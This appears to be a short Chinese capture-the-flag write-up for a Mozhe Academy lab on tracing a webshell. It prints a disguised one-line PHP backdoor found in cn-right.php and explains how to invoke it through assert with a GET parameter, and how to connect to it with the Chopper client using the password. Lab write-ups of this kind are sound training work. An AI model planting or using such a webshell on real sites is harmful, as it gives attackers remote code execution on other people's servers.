墨者学院 - WebShell代码分析溯源(第1题)

下载源码

使用seay源代码审计系统扫一扫（实在不想一个个去看。。。）

seay源代码审计系统：https://pan.baidu.com/s/1UhIqGc_wYfelqN47Tn_Qjg

下载出源代码，找到cn-right.php

<?php
error_reporting(0);
$_GET['POST']($_POST['GET']);
?>

典型变形一句话木马，需要构造为<?php assert($_POST['pass']);?>

则get传入“POST=assert”，POST传入密码“GET”

构造如下：http://xxxx/www/cn-right.php?POST=assert 密码为 GET
然后在菜刀连接的时候，在路径后面加上?POST=assert
密码是GET
然后寻找目标文件就ok